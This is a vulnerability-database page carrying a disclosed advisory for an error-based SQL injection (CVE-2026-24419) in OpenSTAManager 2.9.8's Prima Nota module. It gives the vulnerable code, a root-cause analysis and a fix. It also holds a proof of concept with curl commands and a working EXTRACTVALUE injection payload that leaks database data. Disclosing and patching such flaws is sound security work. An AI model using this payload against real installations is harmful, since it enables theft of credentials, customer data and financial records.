Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 OpenSTAManager 2.9.8 SQL Injection

🗓️ 13 Apr 2026 00:00:00Reported by Łukasz RybakType 
packetstorm
 packetstorm🔗 packetstorm.news👁 51 Views

OpenSTAManager 2.9.8 has a high SQL injection in the Prima Nota module via id_documenti.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for SQL Injection in Devcode Openstamanager
11 Apr 202619:14
githubexploit
ATTACKERKB		CVE-2026-24419
6 Feb 202618:05
attackerkb
Circl		CVE-2026-24419
6 Feb 202616:47
circl
CNNVD		OpenSTAManager 安全漏洞
6 Feb 202600:00
cnnvd
CVE		CVE-2026-24419
6 Feb 202618:05
cve
Cvelist		CVE-2026-24419 OpenSTAManager has an SQL Injection in the Prima Nota module
6 Feb 202618:05
cvelist
EUVD		EUVD-2026-5639
6 Feb 202618:05
euvd
Github Security Blog		OpenSTAManager has a SQL Injection in the Prima Nota module
6 Feb 202618:25
github
NVD		CVE-2026-24419
6 Feb 202618:15
nvd
OSV		CVE-2026-24419 OpenSTAManager has an SQL Injection in the Prima Nota module
6 Feb 202618:05
osv
Rows per page
# CVE-2026-24419: OpenSTAManager has a SQL Injection in the Prima Nota  module 
    
    ## Overview
    
    | Field | Details |
    |---|---|
    | **CVE ID** | [CVE-2026-24419](https://nvd.nist.gov/vuln/detail/CVE-2026-24419) |
    | **Severity** | HIGH |
    | **Advisory** | [View Advisory](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6) |
    | **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
    
    ## Affected Products
    
    - **devcode-it/openstamanager** (versions: <= 2.9.8)
    
    
    ## CWE Classification
    
    - CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
    
    ## Details
    
    ### Summary
    
    Critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages by injecting malicious SQL into URL parameters.
    
    **Status:** ✅ Confirmed and tested on live instance (v2.9.8)
    **Vulnerable Parameters:** `id_documenti` (GET parameters)
    **Affected Endpoint:** `/modules/primanota/add.php`
    **Attack Type:** Error-Based SQL Injection (IN clause)
    
    ### Details
    
    OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from GET parameters are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
    
    **Vulnerability Chain:**
    
    1. **Entry Point:** `/modules/primanota/add.php` (Lines 63-67)
       ```php
       $id_documenti = $id_documenti ?: get('id_documenti');
       $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
       ```
       **Impact:** The `get()` function retrieves user-controlled URL parameters, `explode(',', (string) ...)` splits them by comma, but NO validation ensures elements are integers.
    
    2. **SQL Injection Point:** `/modules/primanota/add.php` (Line 306)
       ```php
       $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
       ```
       **Impact:** Array elements from `$id_documenti` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL injection. 
    
    
    **Root Cause Analysis:**
    
    The vulnerability exists because:
    1. `get('id_documenti')`  return user-controlled strings
    2. `explode(',', (string) $value)` splits by comma but doesn't validate types
    3. `implode(',', $array)` concatenates array elements directly into SQL
    4. No validation ensures array elements are integers
    5. Attacker can inject SQL by providing: `?id_documenti=1) AND EXTRACTVALUE(...) %23`
    
    **Affected Code Path:**
    ```
    GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
      ↓
    add.php:63 - $id_documenti = get('id_documenti')
      ↓
    add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION]
      ↓
    add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]
    ```
    
    ### PoC
    
    
    **Step 1: Login**
    ```bash
    curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
      -d 'username=admin&password=admin'
    ```
    
    **Step 2: Verify Vulnerability (Error-Based SQL Injection)**
    
    **Test 1: Extract Database User and Version**
    ```bash
    curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"
    ```
    
    **Response (error message visible to attacker):**
    ```html
    <code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
    ```
    <img width="1231" height="405" alt="image" src="https://github.com/user-attachments/assets/1657b844-281a-431b-8472-c81e4d90bf64" />
    
    
    ### Impact
    
    All authenticated users with access to the Prima Nota (Journal Entry) module.
    
    
    ### Recommended Fix
    
    **Primary Fix - Type Validation:**
    
    File: `/modules/primanota/add.php`
    
    **BEFORE (Vulnerable - Lines 63-67):**
    ```php
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    ```
    
    **AFTER (Fixed):**
    ```php
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    // Validate that all array elements are integers
    $id_documenti = array_map('intval', $id_documenti);
    $id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs
    ```
    
    ### Credits
    Discovered by Łukasz Rybak
    
    ## References
    
    - https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24419
    - https://github.com/advisories/GHSA-4j2x-jh4m-fqv6
    
    
    ## Disclaimer
    
    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.5
CVSS 48.7
EPSS0.00013
SSVC
openstamanagerprima nota modulesql injectionid_documentiprimanota add endpointauthenticated access
51